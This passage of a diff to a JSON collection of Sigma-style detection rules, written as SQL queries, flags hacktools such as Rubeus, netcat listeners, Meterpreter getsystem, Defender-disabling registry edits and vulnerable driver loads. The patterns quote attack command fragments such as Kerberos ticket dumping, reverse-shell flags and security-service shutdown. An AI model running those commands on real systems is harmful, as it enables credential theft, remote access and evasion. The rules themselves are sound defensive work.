'%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 
'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR 
CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": 
"Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' 
ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unlikely" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR 
(CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE 
'%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.collection", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown", + "Other security solution installers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine 
LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Download 
Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "status": "test", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a method often used by ransomware. 
Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN 